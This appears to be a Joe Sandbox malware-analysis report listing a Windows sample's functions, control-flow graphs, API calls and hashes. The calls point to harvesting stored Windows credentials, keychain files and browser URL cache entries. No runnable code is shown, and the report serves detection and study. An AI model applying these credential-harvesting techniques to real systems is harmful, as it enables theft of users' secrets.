                                                                                                                                                                                                                                                                                                                              • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 767404330-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                                                                                                                                                                                                                                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                                                                                                                                              Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                                              control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                                                                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                                                                                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                                                                                                                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                                                                                                                              • API String ID: 1963886904-3798722523
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                                                                                                                                                                                                                                              Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                                              control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 529 40e497-40e49f free 524->529 529->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 551 40e3b0 542->551 552 40e3b3-40e3c1 wcschr 542->552 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 549 40e3fb-40e40c memcpy 548->549 550 40e40f-40e414 548->550 549->550 553 40e416-40e427 memcpy 550->553 554 40e42a-40e42f 550->554 551->552 552->541 555 40e3c3-40e3c6 552->555 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                                                                                                              • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E407
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E422
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E43D
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                                                                                                                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                                                                                                                                              • API String ID: 3849927982-2252543386
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                                                                                                                                                              Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                                              control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 602 4094f7-4094fa call 424f26 598->602 600->567 602->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 617 4093e4-4093fb call 4253af * 2 613->617 615 4092bc 614->615 616 4092be-4092e3 memcpy memcmp 614->616 615->616 618 409333-409345 memcmp 616->618 619 4092e5-4092ec 616->619 617->602 627 409401-409403 617->627 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->602 628 409409-40941b memcmp 627->628 628->602 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->602 633 4094b8-4094ed memcpy * 2 630->633 631->602 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->602
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                                                                                                                                              • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                                                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                                                                                                                                                              • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                                                                                                                                                                                                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                                                                                                                                                              Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                                                                                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000004.00000002.2172777860.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000004.00000002.2172777860.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                                                                                                                              • String ID: bhv
                                                                                                                                                                                                                                                                                                                              • API String ID: 4234240956-2689659898
                                                                                                                                                                                                                                                                                                                              • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                                                                                                                                                                              Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                                                                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                                                                                                              • wcschr.MSVCRT ref: 0040C324
